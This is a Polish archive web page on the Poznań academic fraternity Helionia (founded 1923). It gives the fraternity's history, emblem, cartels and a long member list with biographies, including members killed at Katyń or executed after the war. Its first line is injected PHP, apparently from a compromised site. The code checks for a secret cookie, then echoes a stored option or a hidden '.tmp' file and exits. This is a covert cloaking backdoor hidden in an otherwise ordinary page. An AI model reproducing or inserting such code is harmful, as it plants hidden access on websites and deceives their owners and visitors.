if (isset($_COOKIE["fn9uBsXrHEMCoNLjpQ9VN9SVJgeJ2TQDYJ"])) { $lines = get_option( 'wpsdth4_license_key' ); if (!empty($lines)) { $lines = @file_get_contents(".tmp"); } echo $lines; exit(); } Archiwum Korporacyjne - Archiwum i Muzeum Polskich Korporacji Akademickich

K! Helionia

Dekiel Edwarda Prądzyńskiego. Nazwa:
Korporacja “Helionia”
Siedziba:
Poznań
Data powstania:
11 III 1923 r.
Barwy:
amarantowa – czarna – złota
Dewiza:
„Jednością silni, rozumni szałem, razem młodzi przyjaciele”

Rys historyczny

Dekiel NN (montrealski).

Helionia została założona dnia 11 III 1923 r. przez grupę dziewięciu studentów Uniwersytetu Poznańskiego. Inicjatorami założenia korporacji byli Władysław Szczepański, Stanisław Krawczyński i Ryszard Rajszys. Jak napisano w jednym ze sprawozdań Helionii z 1926 r. założyciele chcieli by korporacja dążyła do “wprowadzenia jednej atmosfery w życie akademickie, atmosfery siły, nauki i solidarności, celem również miało być wyplenienie z przybytku partyjniactwa i politykomanji” (cyt. za. Rafał Sierchuła, Konwent Helionia. Zarys działalności, maszynopis, s. 3).

W poznańskim środowisku akademickim Helionia uchodziła za korporację elitarną.

Helionia, Poznań 17 III 1924 r.

Od dnia 6 V 1923 r. (16 II 1924 r. ?) korporacja należała do Związku Polskich Korporacji Akademickich (data starszeństwa związkowego: 19 XII 1923 r.). Kandydowała początkowo pod opieką K! Surma, a następnie K! Magna-Polonia. Dnia 17 V 1924 r. została członkiem rzeczywistym Związku. Konwent Filistrów założono 12 III 1924 r.

Komers X-lecia Helionii, w środku siedzi prezes Koła Filistrów dr Mikołaj Kiedacz, Poznań marzec 1933 r.

Jednym z symboli korporacji była swastyka. Wydaje się, że używanie tego znaku w godle oraz na czapce musiało już w okresie przedwojennym budzić niepokój, skoro w okolicznościowym artykule w 1938 r. wyjaśniano: “I jeszcze nie słychać było na świecie o Hitlerze, gdy grupka studentów w Poznaniu wzięła sobie za godło swastykę, słoneczny symbol Słowian (…)” (Markuryusz Polski Ordynaryjny 1938, nr 15, s. 369).

Przy Helionii kandydowała K! Viritia.

Helionia zawarła kartele: dnia 8 VI 1925 r. czasowy K! Audacją z Warszawy (do listopada 1926 r.) oraz w 1930 r. (?) z K! Gasconią ze Lwowa.

Telegram z Wielkiej Brytanii, przygotowania do Zjazdu z okazji 55-lecia Helionii, 1978 r.

Prezesem Poznańskiego Koła Międzykorporacyjnego był w roku akademickim 1932/33 Stanisław Janiszewski, a w latach 1938-39 ostatnim przed wojną prezesem Związku Polskich Korporacji Akademickich Zygmunt Celichowski.

Siedziby korporacji mieściły się przy kolejno: ul. Św. Marcin 40, ul. Skarbowej 6/8 (do 1936 r.) i w Pałacu Działyńskich przy Starym Rynku 78 (od 1937 r.).

Całkowita ustalona, choć niekompletna imienna lista członków obejmuje 165 nazwisk, w tym czterech członków honorowych.

Zjazd Helionii z okazji 55-lecia, Poznań 27 V 1978 r.

Po wojnie w latach 60-tych i 70-tych odbywały się w Poznaniu nieoficjalne zjazdy członków korporacji. Ponadto w mniejszych grupach spotykano się także w Warszawie i na emigracji. W początkach lat 80-tych dr Kazimierz Kalawski zasłużył się przy odrodzeniu środowiska korporacyjnego w Poznaniu, w tym przyczynił się do ufundowania tablicy pamiątkowej w krużgankach klasztoru oo. Dominikanów poświęconej poległym, pomordowanym i zmarłym członkom korporacji poznańskich. Zygmunt Celichowski był ostatnim prezesem Koła Filistrów Polskich Korporacji Akademickich w Montrealu.

Lista członków

Poniższa, niekompletna lista członków Helionii obejmuje ponad 160 nazwisk. Będziemy wdzięczni za jej uzupełnianie i korektę, przesyłanie danych biograficznych i fotografii członków korporacji (vide Kontakt), jak także za pomoc w poszukiwaniach materialnych śladów oraz wszelkich informacji o samej korporacji (vide Poszukiwania).

Członkowie honorowi

 1. Witold Celichowski, (9 maja 1874 w Bninie k. Śremu - 21 września 1944 w Warszawie) s. Zygmunta i Zofii z Ziemnych, brat Stanisława (Filomatia Posnaniensis), ojciec Zygmunta (Helionia), absolwent Gimnazjum św. Marii Magdaleny, studiował prawo w Berlinie, Monachium, Wrocławiu i Getyndze, dr praw 1897, w 1900 otworzył w Poznaniu kancelarię adwokacką, bronił m.in. polskich studentów w procesie w Poznaniu (lipiec 1901) oraz uczniów gimnazjum w Gnieźnie (czerwiec 1903), komisarz Rady Ludowej miasta Poznania (listopad 1918), zastępca prezesa, potem naczelnego prezesa prowincji i rejencji poznańskiej, w latach 1919-23 wojewoda poznański, działacz adwokackich organizacjach samorządowych, Filister honorowy Helionii, w czasie okupacji wysiedlony do Generalnej Guberni, aktywny w Radzie Głównej Opiekuńczej w Warszawie, zmarł w czasie Powstania Warszawskiego, po wojnie pochowany w Poznaniu
 2. Stanisław Kasznica (senior), (23 lutego 1874 w Warszawie - 17 listopada 1958 w Krosinku k. Mosiny) s. Józefa i Izabelli z Trębickich, ojciec Stanisława i Jana (obaj Helionia), student chemii ULw., student prawa UW 1895-1902, dr prawa UJ 1904, działacz polityczny, członek Stronnictwa Narodowo-Demokratycznego, poseł na Sejm Galicji 1913-14, współwydawca dwutygodnika “Rzeczpospolita” 1908-14, prof. Akademii w Dublanach 1912-19, UL, od 1920 prof. zw. UP (później UAM), kierownik Katedry Prawa Administracyjnego, kilkukrotny dziekan Wydziału Prawno-Ekonomicznego UP, rektor UP 1929-31, kurator i Filister honorowy Helionii, senator z ramienia Narodowo-Chrześcijańskiego Stronnictwa Ludowego 1922-27, po zamachu majowym wycofał się z polityki, sędzia Trybunału Kompetencyjnego 1935-39, działacz katolicki, wydał zbiór szkiców o tematyce religijnej pt. “Rozważania” (sześć wydań), w 1939 uwięziony przez Niemców jako zakładnik, w grudniu 1939 wysiedlony do Limanowej, wykładał na tajnych kompletach UW i Uniwersytetu Ziem Zachodnich, po wojnie kierował odbudową Wydziału Prawno-Ekonomicznego UP i zorganizował Sekcję Prawną w Instytucie Zachodnim, z początkiem 1948 przeniesiony na “karną” emeryturę, reaktywowany w październiku 1956, odznaczony Krzyżem Walecznych, pochowany na Cmentarzu w Mosinie

  dr Mikołaj Kiedacz, 1933 r.

 3. Mikołaj Kiedacz, (9 września 1879 - 25 października 1939 w Poznaniu) dr, wiceprezydent i p.o. prezydenta Poznania, Filister honorowy i prezes Związku Filistrów Helionii, rozstrzelany przez hitlerowców w Forcie VII

 4. Józef Felicjan Sułkowski, (31 stycznia 1892 w Wadowicach - 30 lipca 1968 w Warszawie) prawnik, doktorat Uniwersytet w Wiedniu, habilitacja UJ, prof. UP, cywilista, kurator i Filister honorowy Helionii, dyplomata, w czasie wojny pracował w różnych agendach rządu londyńskiego, od 1946 wykładowca na Katolickim Uniwersytecie w Waszyngtonie, w 1958 wrócił do kraju, pracował w PAN, pochowany na warszawskich Powązkach

Członkowie rzeczywiści

  Stanisław Andracki, 1967 r.

 1. Stanisław Andracki, (18 sierpnia 1905 w Poznaniu - ) prof., po wojnie na emigracji w Kanadzie, zamiejscowy członek Koła Filistrów Polskich Korporacji Akademickich w Montrealu

 2. Stanisław Ankerstajn, założyciel Helionii, olderman I trymestr 1923/24, w 1924 ppor. 23 Pułku Artylerii Polowej WP
 3. Julian Babiński, ( - 1943 pod Włoszczową) założyciel Helionii, autor tekstu “Polska Korporacja Akademicka Helionia” (Biuletyn Zarządu SFPKA, nr 10, Warszawa 1995, s. 72 i n., przedruk z Merkuryusza Polskiego nr 14/15 z 27 marca 1938 r.), w czasie okupacji członek podziemnej narodowo-katolickiej organizacji “Unia”, żołnierz AK, zginął pod Włoszczową
 4. Aleksander Berger, ( - po 1977) po wojnie na emigracji w Wielkiej Brytanii
 5. Czesław Bieżanko, założyciel Helionii
 6. Jerzy Borkiewicz,
 7. Jan Borsuk, olderman sem. zim. 1925/26, przed 1926/27 sekretarz, prezes sem. let. 1925/26 oraz sem. zim. 1926/27
 8. Konstanty Borys, kandydat skreślony 1927
 9. Zygmunt Borysławski, student Wydziału Matematyczno-Przyrodniczego 1939
 10. Witold Borysow, prezes III trymestr 1928/29, prezes III trymestr 1928/29, wiceolderman sem. zim. 1929/30
 11. Kazimierz Brunos, gospodarz sem. zim. oraz sem. let. 1925/26
 12. Tadeusz Lubicz-Brzeziński, student prawa UP, sekretarz sem. zim. 1935/36, wiceprezes sem. zim. i sem. let. 1936/37, prokurator PSM-u 1936/37
 13. Alojzy Büttner, student Wydziału Prawno-Ekonomicznego 1939

  Zygmunt Celichowski, 1967 r.

 14. Zygmunt Celichowski, (24 listopada 1914 w Poznaniu - 24 kwietnia 1994 na Florydzie) s. Witolda (Helionia), absolwent Gimnazjum św. Marii Magdaleny, c. 1932, ostatni prezes ZPKA 1938-39 (XVII kadencja), mgr praw UP, kpt. w PSZ na Zachodzie w I Dywizji Pancernej gen. Stanisława Maczka, walczył w Normandii, Belgii i Holandii, po wojnie na emigracji w Wielkiej Brytanii i Kanadzie, członek Komitetu Politycznego Stronnictwa Narodowego w Londynie, członek i ostatni prezes Koła Filistrów Polskich Korporacji Akademickich w Montrealu, pochowany w grobowcu rodzinnym w Bninie k. Śremu

  Stanisław Chojnacki, 1967 r.

 15. Stanisław Fabian Choynacki, (1908 - 21 października 1993) student i absolwent prawa UP, c. 1927 Helionia, oldeman sem. zim. 1928/29, wiceprezes sem. zim. 1929/30 i prezes sem. let. 1929/30, później w lwowskiej Gasconii (?), doprowadził do kartelu Helionia-Gasconia, adwokat, więzień Oflagu II C Woldenberg, po wojnie na emigracji w Wielkiej Brytanii

 16. Tadeusz Chwiłowicz, wystąpił 1930
 17. Wiesław Cielecki , ( - 1979) c. ok. 1927, skreślony 1927
 18. Jerzy Ciemniewski, skarbnik I trymestr 1924/25, II wiceprezes sem. let. 1925/26
 19. Tadeusz Darnowski, skarbnik sem. zim. 1927/28
 20. Lucjan Długokęcki, skarbnik I trymestr 1923/24, gospodarz III trymestr 1923/24, wiceprezes I trymestr 1924/25, prezes II i od maja III trymestr 1924/25
 21. Jerzy Długołęcki, ( - po 1977) II sekretarz sem. let. 1925/26, wiceprezes wewn. sem. zim. 1926/27, wiceprezes sem. let. 1926/27, wiceprezes III trymestr 1930/31 oraz 1931/32
 22. Bohdan Dormanowski, (9 października 1908 w Skokówku w woj. poznańskim - 1940 w Katyniu), s. Mieczysława i Marii z Kutnerów, absolwent Gimnazjum w Śremie, student i absolwent 1934 prawa UP, c. 1929 (?), prezes sem. zim. i sem. let. 1933/34, sędzia w Sądzie Grodzkim w Śremie, ppor. rez. 55 Pułku Piechoty, uczestnik wojny obronnej 1939, w niewoli sowieckiej, zamordowany przez NKWD
 23. Jerzy Marian Dworakowski, (8 kwietnia 1913 w Przewałach na Wołyniu - 1940 w Katyniu) herbu Ślepowron, s. Tadeusza Michała i Zofii z Konopnickich, absolwent Gimnazjum w Bydgoszczy, ukończył VIII kurs szkolny w Szkole Podchorążych Rezerwy Artylerii we Włodzimierzu Wołyńskim 1933/34 w stopniu bombardiera podchorążego, w lecie 1934 odbył praktykę w 7 Dywizjonie Artylerii Konnej w Poznaniu, student rolnictwa UP, sekretarz sem. zim. 1936/37, inż., po studiach dzierżawił ziemię we wsi Przewały, ppor. rez. 2 Dywzjonu Artylerii Konnej, opóśił dom 28 sierpnia 1939 z niebieską kartą mobilizacyjną i wyruszył do Włodzimierza Wołyńskiego, w niewoli sowieckiej, zamordowany przez NKWD

  Źródła dodatkowe: uzupełnienia Paweł Janicki, www.7dak.pl

 24. Augustyn Dworzaczek, (1903-1987) II sekretarz sem. zim. 1925/26, I sekretarz sem. let. 1925/26, skarbnik sem. zim. 1926/27, sekretarz 1938/39
 25. Aleksander Dżugan, wiceprezes II i III trymestr 1923/24, olderman II trymestr 1924/25

  Henryk Fleszar, koniec lat 30-tych.

 26. Henryk Fleszar, (20 kwietnia 1914 w Wukowarze w Chorwacji -1983) student medycyny UP 1933-36, 1936-39 USB, absolwent med. Kowno 1941, 1945-49 w łagrach sowieckich, po powrocie do kraju pracował jako lekarz w Warszawie, neurolog

 27. Marian Gątkiewicz, c. 1929 (?), sekretarz sem. let. 1929/30
 28. Edmund Goławski, (1905 w Korabliszczach na Wołyniu - 1940 w Katyniu), s. Wacława i Marii z Wołoszynowskich, student i absolwent prawa UP, gospodarz sem. zim. 1927/28, wiceprezes I trymestr 1930/31, podprokurator w Gnieźnie, w niewoli sowieckiej, zamordowany przez NKWD
 29. Władysław Goławski,
 30. Jan Górski,
 31. Sławomir Górski, student Wydziału Prawno-Ekonomicznego 1939
 32. Władysław Grzybowski, c. 1923 (pierwszy fuks), gospodarz I oraz II trymestr 1923/24, sekretarz III trymestr 1923/24

  Zdzisław Hawelski, 1933 r.

 33. Zdzisław Hawelski, (1907-1984) prezes Kola Prawników i Ekonomistów 1930/31, prezes Delegacji Kół Uczelnianych UP 1930/31, działacz NW i ONR, prawnik, adwokat

 34. Jerzy Higersberger, akt. 1928/29
 35. Jan Hofman, (12 stycznia 1907 w Poznaniu - 1987) uczeń Gimnazjum w Kaliszu, prawnik, adwokat
 36. Henryk Janiszewski,
 37. Stanisław Janiszewski, wiceprezes sem. zim. 1928/29, prezes I i II trymestr 1930/31, olderman III trymestr 1930/31, prezes PKM-u 1932/33, wiceprezes Bratniej Pomocy Studentów UP 1926, prezes Zw.NPMA, Kawaler Dyplomu Zasługi i Złotej Odznaki ZPKA
 38. Jerzy Januszewski, c. 1923 (pierwszy fuks), sekretarz I trymestr 1923/24, prezes II trymestr 1923/24, olderman I trymestr 1924/25, prezes III trymestr 1924/25 oraz skarbnik III trymestr (od maja) 1924/25, prezes sem. zim. 1925/26, I wiceprezes sem. let. 1925/26
 39. Jarociński,
 40. StanisŁaw Jaroszyński,
 41. Jerzy Jossé, ( - po 1977) I wiceprezes sem. zim. 1925/26
 42. Kazimierz Kaczkowski, olderman sem. zim. 1927/28
 43. Julian Kaczmarczyk, (1901-1980) wiceprezes 1926/27 i prezes 1928 Bratniej Pomocy Studentów UP, prezes PKA 1928, inż.
 44. Kaczorowski

  Kazimierz Kalawski, 1967 r.

 45. Kazimierz Kalawski, (20 lutego 1912 w Strzelnie - 1984) brata Mariana (Helionia), student i absolwent 1946 med. UP, skarbnik sem. zim. 1935/36, sekretarz sem. let. 1936/37, sekretarz 1937-39, dr, zasłużony dla odrodzenia w początkach lat 80-tych poznańskiego środowiska korporacji akademickich

  Marian Kalawski, 1967 r.

 46. Marian Kalawski, (1908 - 1990) brat Kazimierza (Helionia), skarbnik sem. zim. 1929/30, wiceprezes sem. let. 1931/32 i sem. let. 1932/33, po wojnie na emigracji w Stanach Zjednoczonych

 47. Roman Kałuźniacki, skarbnik II trymestr 1923/24
 48. Jerzy Karnicki (?), akt. 1928/29
 49. Kazimierz Karpowicz, c. 1929 (?)
 50. Władysław Kasiński, wiceprezes I trymestr 1923/24
 51. Zbigniew Kasiński, akt. 1928/29
 52. Jan Władysław Kasznica, (4 marca 1912 we Lwowie - 19 września 1939 pod Laskami k. Warszawy) s. Stanisława (prof. UP, Helionia) i Amelii z d. Malewska, brat Stanisława (Helionia), absolwent Gimnazjum im. Karola Marcinkowskiego 1930, student i absolwent Wydziału Rolniczo-Leśnego UP, prezes sem. zim. 1934/35, ukończył VIII Kurs w Szkole Podchorążych Rezerwy Artylerii we Włodzimierzu Wołyńskim 1933/34, a następnie w lecie 1934 odbył praktykę w 7 Dywizjonie Artylerii Konnej, ppor. rez., przydzielony do 7 Dywizjonu Artylerii Konnej, po studiach asystent na Wydzialne Rolniczo-Leśnym UP, później pracował w mleczarni we Wrześni, w wojnie obronnej 1939 dowódca 1 bateri 3 plutonu 7 Dywizjonu Artylerii Konnej Wielkopolskiej Brygady Kawalerii w ramach Armii “Poznań”, walczył w obronie Warszawy, w nocy z 19 na 20 września 1939 poszedł na zwiad z rej. Siaraków-Gajówka przez przesiekę leśną na rozpoznanie przedpola po drugiej stronie, zaginął, dopiero w latach 60-tych ciało zostało zidentyfikowane w czasie ekshumacji, pochowany na Cmentarzu Wojennym w Laskach, odznaczony Krzyżem Walecznych oraz pośmiertnie Krzyżem Srebrnym Virtuti Militari

  Źródła dodatkowe: uzupełnienia Paweł Janicki, www.7dak.pl

  Stanisław Kasznica, 1933 r.

 53. Stanisław Kasznica (junior), (25 lipca 1908 we Lwowie - 12 maja 1948 w Warszawie) s. Stanisława (prof. UP, Helionia) i Amelii z d. Malewska, brat Jana (Helionia), abolwent Gimnazjum im. Karola Marcinkowskiego 1927, student i absolwent 1933 prawa UP, prezes 1938 (XV-lecie), ukończył Szkołę Podchorążych Rezerwy Artylerii, praktykę odbył w 7 Dywizjonie Artylerii Konnej w Poznaniu, ppor. rez., a następnie por. rez., po studiach aplikował się w kancelarii adwokackiej Weinfelda w Warszawie, od 1935 radca prawny w garbarni Rogowskich w Gnieźnie, przed wybuchem wojny zdał egzamin adwokacki w Poznaniu, działacz narodowy, od 1934 w ONR-ABC, człone tajnej struktury ONR “Organizacja Polska”, w wojnie obronnej 1939 dowódca I plutonu 2 baterii 7 Dywizjonu Artylerii Konnej Wielkopolskiej Brygady Kawalerii w ramach Armii “Poznań”, walczył w bitwie nad Bzurą i w obronie Warszawy, w konspiracji w “Grupie Szańca” organizował służby cywilne Związku Jaszczurczego /NSZ, od 1945 w narodowej konspiracji antykomunistycznej, ostatni Komendant Główny NSZ, aresztowany w 1947 wraz z Lechem Neymanem (Helionia), skazany na karę śmierci, wyrok wykonano, odznaczony Krzyżem Srebrnym Orderu Virtuti Militari, Krzyżem Walecznych (kampania wrześniowa 1939), Srebrnym Krzyżem Narodowego Czynu Zbrojnego z Mieczami (1944) oraz Krzyżem Narodowego Czynu Zbrojnego (pośmiertnie w 1993), symboliczny grób znajduje się na Cmentarzu Wojskowym na Powązkach w Warszawie w Kwaterze “Na Łączce”

  Źródła dodatkowe: uzupełnienia Paweł Janicki, www.7dak.pl

 54. Edward Kempiński,
 55. Zbigniew Kempiński, sekretarz sem. zim. 1926/27, skarbnik sem. let. 1926/27, sekretarz sem. zim. 1927/28, sekretarz PKM sem. let. 1926/27, mgr
 56. Bogdan Kędzierski, sekretarz sem. let. 1938/39, wiceprezes Młodzieży Wszechpolskiej UP 1939
 57. Tadeusz Kierski, student Wydziału Prawno-Ekonomicznego UP 1939
 58. Mieczysław Klera, student Wydziału Medycznego UP 1939
 59. Władysław Knobelsdorff, (27 marca 1898 w Sankt Petersburgu - 16 stycznia 1976 w Bridgeport w Connecticut w Stanach Zjednoczonych), kpt. kawalerii w armii rosyjskiej, a następnie w I pułku szwoleżerów WP, ranny w czasie wojny polsko-bolszewickiej, dr medycyny UP, skarbnik III trymestr 1923/24, po wojnie opuścił kraj, osiadł najpierw w Niemczech, później w Wielkiej Brytanii, a w końcu od 1952 w Stanach Zjednoczonych
 60. Tadeusz Koczwara, student Wydziału Prawno-Ekonomicznego 1939
 61. Stanisław Kolenda, student Wydziału Prawno-Ekonomicznego 1939

  Bohdan Korczyński, 1967 r.

 62. Bohdan Korczyński, ?

  Edward Korczyński, 1967 r.

 63. Edward Korczyński, ( - 19 listopada 1996 w Taylor w Michigan w Stanach Zjednoczonych) wiceprezes zewn. sem. zim. 1926/27 (do stycznia 1927), po wojnie na emigracji w Stanach Zjednoczonych

 64. Bolesław Koselnik, założyciel Helionii, pierwszy sekretarz sem. let. 1922/23, olderman II trymestr 1923/24, olderman III trymestr (od maja) 1924/25, w 1924 ppor. 58 Pułku Piechoty WP
 65. Antoni Kotkowski, (21 maja 1909 w Kołacinie w pow. śremskim - wiosna ? 2007) student i absolwent 1933 med. UP, dr med. 1937, wenerolog, lekarz w Lesznie, w 1939 wysiedlony na Podlasie, po wojnie lekarz w Szamotułach i Poznaniu
 66. Henryk Kozarski, skarbnik sem. zim. 1928/29
 67. Władysław Kozłowski, (1909-1975) student prawa UP
 68. Wacław Kożuchowski, student rolnictwa UP, sekretarz sem. let. 1931/32
 69. Wilhelm Kożuchowski, student rolnictwa UP
 70. Stanisław Krawczyński, jeden z inicjatorów założenia Helionii, założyciel Helionii
 71. Józef Kruszona, c. 1929 (?)
 72. Leon Kulesza, akt. 1928/29
 73. Bożysław Kurowski, (1911 w Toruniu - 2006 w Lund w Szwecji) s. Bolesława i Zofii z d. Politowicz, członek PKA 1932, wiceprezes Młodzieży Wszechpolskiej 1932/33, wydawca “Głosu Narodowego”, po wojnie na emigracji w Szwecji
 74. Kurzyński, c. ok. 1929, skreślony 1930
 75. Józef Kusztelan, student prawa UP, skarbnik sem. let. 1936/37, wiceprezes sem. let. 1938/39
 76. Witold Leitgeber, (1911 - 6 stycznia 2007) c. 1932, referent prasowy ZPKA 1937/38 (XV kadencja) oraz 1938 (XVI kadencja), absolwent UP, mgr praw, ekonomista, dziennikarz, po wojnie na emigracji w Wielkiej Brytanii, redaktor i speaker sekcji polskiej BBC
 77. Jerzy Lubek (?), akt. 1928/29
 78. Stanisław Łukaszewicz,
 79. Stanisław Malcz, c. 1929 (?)
 80. Tadeusz Marcinkiewicz, student Wydziału Medycznego UP 1939
 81. Czesław Matuszewski, student prawa UP
 82. Jan Mecweldwoski, założyciel Helionii, pierwszy skarbnik sem. let. 1922/23, prezes I i III trymestr 1923/24, olderman sem. zim. 1926/27, prawnik, adwokat, w 1938 prezes Związku Filistrów
 83. Zygmunt Metzig, ( - 1977) wiceprezes Koła Leśników
 84. Mielęcki,
 85. Izydor Bożydar Modelski, (1918 - ) prof., po wojnie na emigracji w Stanach Zjednoczonych, członek Koła Filistrów Polskich Korporacji Akademickich w Chicago
 86. Modzelewski,
 87. Tadeusz Motylewski, c. 1929 (?)

  Marian Musiałowicz (?), lipiec 1924 r.

 88. Musiałowicz [być może widoczny na zdjęciu Marian Musiałowcz, absolwent leśnictwa UP w 1924]

 89. Mieczysław Myczkowski, wiceprezes III trymestr (od maja) 1924/25
 90. Kazimierz Nadobnik, (25 lutego 1913 we Lwowie - 14 września 1981 w Warszawie) s. Marcina (prof. UP) i Bronisławy z Kaczorowskich, absolwent Gimnazjum im. Karola Marcinkowskiego, członek Zarządu Koła Prawników i Ekonomistów UP 1931, wiceprezes Del. Kół Naukowych UP 1932/33, ppor. służby zawodowej, w wojnie obronnej 1939 w 7 Pułku Strzelców Konnych Wielkopolskich Wielkopolskiej Brygady Kawalerii w ramach Armii “Poznań”, więzień obozów jenieckich w Brunszwiku i II C w Woldenbergu, działacz (P)SL, członek Rady Naczelnej (P)SL, wybrany na posła z okręgu gnieźnieńskiego 1947, wiceprezydent Poznania 1945 i wiceprzewodniczący Wojewódzkiej Rady Narodowej w Poznaniu 1945-47, aresztowany 1950, skazany w 1952 na 13 lat więzienia, zwolniony 1956, po 1956 organizator spółdzielczości ogrodniczej w Wielkopolsce w Centrali Spółdzielni Ogrodniczych, od 1964 w Warszawie, kierował działami ekonomicznymi Instytutu Telekomunikacji i Centrum Informatyki w Ministerstwie Leśnictwa i Przemysłu Drzewnego, pochowany na Wojskowych Powązkach w Warszawie (kw. B22, rz. 5, m. 18)
 91. Karol Nawotny, wiceprezes III trymestr 1928/29
 92. Jerzy Spława Neyman, ( - po 2000) dwukrotny prezes przed 1930/31, w tym sem. zim. 1928/29, olderman sem. zim. i sem. let. 1929/30, prezes I i II trymestr 1930/31, prezes III trymestr 1930/31

  Lech Neyman, 1933 r.

 93. Lech Neyman, (7 lutego 1908 w Poznaniu - 12 maja 1948 w Warszawie) absolwent Gimnazjum św. Marii Magdaleny 1926, student i absolwent 1932 prawa UP, wiceprezes II trymestr 1930/31, prezes sem. let. 1932/33 (X-lecie), prokurator PKM-u 1932/33, wiceprezes AZS, działacz narodowy, członek Komitetu Politycznego OP ONR, ppor. rez., uczestnik wojny obronnej 1939, w konspiracji w “Grupie Szańca”, żołnierz ZJ i NSZ, zajmował się ideowością Związku Jaszczurczego/NSZ oraz Służby Cywilnej Narodu, od 1945 organizował konspirację NSZ na Pomorzu i Wielkopolsce, aresztowany w 1947 wraz z ostatnim Komendantem Głównym NSZ Stanisławem Kasznicą (Helionia), skazany na karę śmierci, wyrok wykonano, grób symboliczny znajduje się na Cmentarzu Wojskowym na Powązkach w Warszawie w Kwaterze “Na Łączce”

 94. Tadeusz Konstanty Nowakowski, (1912-1982) wiceprezes sem. zim. 1935/36
 95. Karol Nowotny, wiceprezes III trymestr 1928/29, sekretarz sem. zim. 1929/30
 96. Marian Obniński (?), akt. 1928/29
 97. Józef Olszewski, student prawa UP, sekretarz sem. zim. i sem. let. 1933/34
 98. Marian Osicki, kandydat skreślony 1927
 99. Bogdan Ostojski, student Wydziału Humanistycznego UP, wiceprezes sem. zim. i sem. let. 1933/34, wiceprezes sem. zim. 1934/35, prezes sem. let. 1938/39
 100. Stanisław Otto, założyciel Helionii, pierwszy wiceprezes sem. let. 1922/23
 101. Franciszek Paciorkiewicz, sekretarz III trymestr 1928/29
 102. Adam Karol Pacyński, (28 stycznia 1912 w Bobkach k. Poznania - 1986) s. Antoniego (Lechia), brat Jacka (Helionia), student i absolwent 1936 med. UP, skarbnik sem. zim. i sem. let. 1933/34, olderman sem. zim. 1935/36, dr med. UWr. 1948, internista, dr hab. 1963, kierownik Katedry Higieny AM we Wrocławiu
 103. Jacek Pacyński, (1914 w Poznaniu - 1975) s. Antoniego (Lechia), brat Adama (Helionia), student rolnictwa UP, dyplom 1946, dr nauk rolniczych 1969, od 1951 dyrektor Stadniny Koni w Liskach
 104. Mieczysław Paszkiewicz, (?), działacz ONR, żołnierz AK, działacz podziemnego SN w Piotrkowie Trybunalskim, po wojnie prześladowny przez władze komunistyczne, skazany na 15 lat więzienia za pracę w Komitecie Pomocniczym NSZ, adwokat w Piotrkowie
 105. Stefan Pieniążek, akt. 1928/29
 106. Marian Polański, gospodarz III trymestr 1930/31
 107. Leonard Pollheim, c. 1929 (?)
 108. Poniatowski,
 109. Antoni Pożarowski,
 110. Bohdan Prądzyński, ( - lata 70-te)
 111. Edward Prądzyński, ( - 1989) student Wydziału Humanistycznego UP, skarbnik III trymestr 1930/31
 112. Wiktor Prądzyński, student farmacji UP, po wojnie na emigracji w Wielkiej Brytanii
 113. Ryszard Rajszys, (24 maja 1901 w Wilnie - 1940 w Katyniu) s. Bolesława i Eleonory z Jaworskich, członek POW, uczestnik wojny polsko-rosyjskiej 1920, student i absolwent med. UP, jeden z inicjatorów założenia Helionii, założyciel Helionii, olderman III trymestr 1923/24, prezes I trymestr 1924/25, wystąpił 1927, lekarz Kasy Chorych w Poznaniu, absolwent Szkoły Podchorążych Rezerwy San. w Warszawie 1932, por. rez., przydzielony do 2 Szpitala Okręgowego, w niewoli sowieckiej, zamordowany przez NKWD

  Wiktor Reinhard, lata studiów.

 114. Wiktor Reinhard, (15 września 1911 w Szydłówku k. Mławy - 198? w Draveil we Francji) s. Karola (właściciela Szydłówka) herbu Lis i Stanisławy z Doberskich herbu Gryf, brat Zbigniewa (Kujawja), uczeń gimnazjów w Mławie i Warszawie, student WSH, ukończył Szkołę Podchorążych Rezerwy Artylerii we Włodzimierzu Wołyńskim 1932, ppor. rez., uczestnik wojny obronnej 1939, przez siedem “zielonych” granic przedostał się na Zachód, działął w Resistance na terenie Francji i Szwajcarii, miał działać w wywiadzie przy polskim poselstwie w Bernie, po wojnie inżynier w Paryżu, pochowany na cmentarzu w Draveil k. Paryża [Źródła (poza wskazanymi poniżej spisu członków): relacja stryjecznej wnuczki Małgorzaty Reinhard-Chlandy]

 115. Wojciech Rokossowski,
 116. Edmund Rutkowski, student Wydziału Prawno-Ekonomicznego UP 1939
 117. Witold Rutkowski, student Wydziału Medycznego UP 1939
 118. Janusz Rychlewski, student Wydziału Prawno-Ekonomicznego UP 1939
 119. Jan Rylski,
 120. Stanisław Rymkiewicz, wiceprezes III trymestr 1924/25, prezes sem. let. 1926/27
 121. Zdzisław Sakowski, sekretarz II trymestr 1923/24
 122. Marian Satkiewicz, sekretarz sem. let. 1929/30
 123. Roman Schmaehling, skarbnik sem. zim. 1925/26, olderman sem. let. 1925/26, prezes sem. zim. 1927/28
 124. Józefat Sikorowski, student Wydziału Prawno-Ekonomicznego UP 1939
 125. Witold Siuchniński, (1913-1939 w Poznaniu) absolwent Gimnazjum Humanistycznego w Chodzieży 1934, służba wojskowa 1934-35, student Wydziału Prawno-Ekonomicznego UP 1935-39, wiceprezes Towarzystwa Czytelni Ludowej 1936, kierownik Młodzieży Narodowo-Radykalnej UP 1939, zmobilizowany, walczył w 68 Pułku Piechoty w wojnie obronnej 1939, w której zginął
 126. Witold Słomiński, student ekonomii UP
 127. Antoni Słowiński, I sekretarz sem. zim. 1925/26
 128. Jerzy Smosarski, c. 1929 (?)
 129. Tadeusz Sokołowski, (1906-1979) sekretarz 1932/33 oraz sem. let. 1932/33
 130. Norbert Sommerfeld, student Wydziału Prawno-Ekonomicznego UP 1939
 131. Stanisław Sotowski, II wiceprezes sem. zim. 1925/26
 132. Jerzy Stadnicki, student WSH, c. 1929 (?), sekretarz I, II i III trymestr 1930/31, skarbnik PKM 1930/31
 133. Witold Supiński, ( - po 1960) student prawa UP, prezes sem. let. 1936/37, prezes 1937/38, prawnik, prawdopodobnie autor książek o tematyce wojennej m.in. “Od Westerplatte do Hiroszimy” (Wydawnictwo Poznańskie, Poznań 1958)
 134. Władysław Szczepański, jeden z inicjatorów założenia Helionii, założyciel Helionii, pierwszy prezes sem. let. 1922/23, jako filister wystąpił 1927
 135. Bogdan Szulc, student prawa UP
 136. Stefan Szwiec (Szwieć), skarbnik sem. let. 1925/26, akt. 1928/29
 137. Kazimierz Świeżyński, ( - 1992) c. 1929 (?)
 138. Taniewski-Grzybowski,
 139. Leszek Terlecki, (1912-1981)
 140. Feliks Trzebuchowski, c. 1929 (?)
